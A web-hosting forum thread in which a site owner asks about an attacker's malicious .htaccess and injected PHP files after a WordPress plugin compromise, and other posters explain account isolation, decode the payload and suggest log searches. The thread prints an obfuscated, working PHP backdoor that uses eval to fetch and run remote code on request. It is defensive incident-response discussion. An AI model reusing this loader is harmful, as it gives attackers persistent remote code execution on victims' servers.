Can a hacker have access to all the websites in public_html ?
Hi,
We had the unpleasant surprise to see that all of our websites present in the public_html directory contained malicious files.
we believe that these files were injected following a security vulnerability in one of our Wordpress plugins.
Can you tell me that if a hacker manages to inject one of our sites he can also have access to all the other site files present in the public_html?
If so, is there a possibility of blocking this without needing to create a Cpanel account for each website?
The hacker renamed all the .htaccess files on our sites to htaccess.th and added his own .htaccess file to all of our sites. It contained the following code:
<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected|php7|php8|pHP7|PHP7|php58)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(index.php|credits.php|customize.php|edit-comments.php|edit-tags.php|edit.php|checkbox.php|export.php|input.php|link.php|load-scripts.php|load-styles.php|dropdown.php|menu.php|nav-menus.php|network.php|options-discussion.php|options-general.php|options-permalink.php|options-privacy.php|options-reading.php|options-writing.php|plugins.php|post-new.php|post.php|privacy.php|profile.php|site-health.php|term.php|text.php|themes.php|tools.php|update-core.php|user-edit.php|user-new.php|users.php|wp-links.php|wp-login.php|wp-signup.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
The hacker injected files everywhere on the sites which always contained the same code which is as follows:
Do you know what this malicious code is used for?
<?php
$co = chr(155-36-15).chr(87+29).chr(63+46).chr(76+13+19).chr(66-33+82).chr(74-36+74).chr(27+40+34).chr(105-8+2).chr(11+35+59).chr(99-3+1).chr(76+13+19).chr(105-8+2).chr(155-36-15).chr(99-3+1).chr(53+36+25).chr(66-33+82).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
$na = chr(59+39).chr(99-3+1).chr(66-33+82).chr(27+40+34).chr(26+28).chr(17+35).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
$ro = chr(4+97+16).chr(53+36+25).chr(76+13+19).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
$AmInE = "ZX\132hbCU\x79OCU\x79\116\x79U\x7a\122\x69U\x79\116\x6dd0\112\124\116C\112\124I3\114\x6dd6dW5jb21\x77c\x6d\126\x7ac\x79U\x79OGd6aW5\x6dbG\1060\132SU\x79OG\112hc2U2\116\1069\x6b\132W\116v\132GUlMjh\x7ad\110\112\x79\132XYlMj\x67lMj\122\102bWl\x75\132U\122\x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ\x67\x3d\x3d";
$AmineDns = "JtZeE+Q/GlrDwQKjmF7KkqeNqco7xyA1m1Fd5vY4Usy2c8NdP33cX7X2g7nOfV76rWAnqE080WxyY+f/HpDfnyAojXTUyY7LtJy0N5Gtqq1q1cXOsWVu2lNLSXrZNXDbUfaHUdfw/25f0xn6Ej0oMJbQxh3eqBabYUJ35Lf5tSfpX4f28IhqcWhysKXEBLQIXzTMbVBmpjAGz6wQXET0WiUlC2qsTcDghVsOKxHYZuAk7ADk8C+gCMl7PC9uHb3PKh96m88SVENqonNW/YHJrC2Rq4wrfCiJY+UaAYFm0ug+o/cg1DTG1BZaGicImu1dNMoKm5LbNnVJz8WeAQLzs5OoGn5JsmueARSw9olAaFG/AMVBTDoHZuguIMVMk2p1KnBJZS/xKJXj0Y0xd2bndmJn8KASneH+IlbaqVQIAnDcTrBNWErUHUdppsQqCI4II1ktawUF8DBUC702QVFn45/nBAWA";/*2e3300cd40ea092e5eeb579abe01e85a*/
eval($co($ro($na($AmInE))));
exit;
?>
-
Based on what you posted, it sounds like you are hosting multiple sites via add-on domains. If that's the case, then they are all owned by the same cPanel user-id and if someone gets access to the account they have access to all the domains in that account.
If you truly want to isolate them, then they need to be separate accounts. Even at that level, it depends on how you configure PHP handlers (for example).
0 -
We agree that to do this he did not need the usernames and password of the Cpanel account but that he went directly through a vulnerability in a plugin which gave him access to the public_html directory?
0 -
If you have a vulnerability where they can upload files, then yes, they have full access to basically every file under that users home folder. They can upload a PHP script that can write/modify any file owned but that user. They can upload scripts that install their own file manager and then have GUI access to every file in that users account etc. etc.
0 -
Thank you for your answer. Ok so we have cleaned all the sites and passed the update package.
On the other hand, I was unable to find out what the purpose of the malicious code that I shared with you was. Do you have an idea ?
0 -
I've just decoded it and put simply, the code waits for a GET request to come in looking like: example.com/page.php?u=XXXXX&p=PASSWORD (where password is the reverse of the md5 hash 48FF3BDBAB87B3EE4D19F29C837D0AAC : I haven't been able to reverse that yet) and XXXXX is a base64 encoded URL which is then passed to curl to fetch. Once that page has been fetched, it is then executed/run.
I would search your Apache access logs for the strings "u=" and "p=" (each prefixed with a question mark, & symbol or ; as a seperator) to see if you can find any references.
If you have SSH access to your account, you can do this via:
grep "[?&;]u=" ~/access-logs/ -r | grep "[?&;]p="
which will search the access logs for lines containing those parameters to see if the code has actually been used.
0 -
Thank you for your answer.
I executed the command you gave me for my Cpanel user but I don't have any results that resemble the example URL you gave me.
Are there any other checks I can do?
0 -
It would not be unusual for the malicious code to be uploaded and then not used/access for days or weeks. The attacker is doing their best to stay under the radar.
0
Please sign in to leave a comment.
Comments
7 comments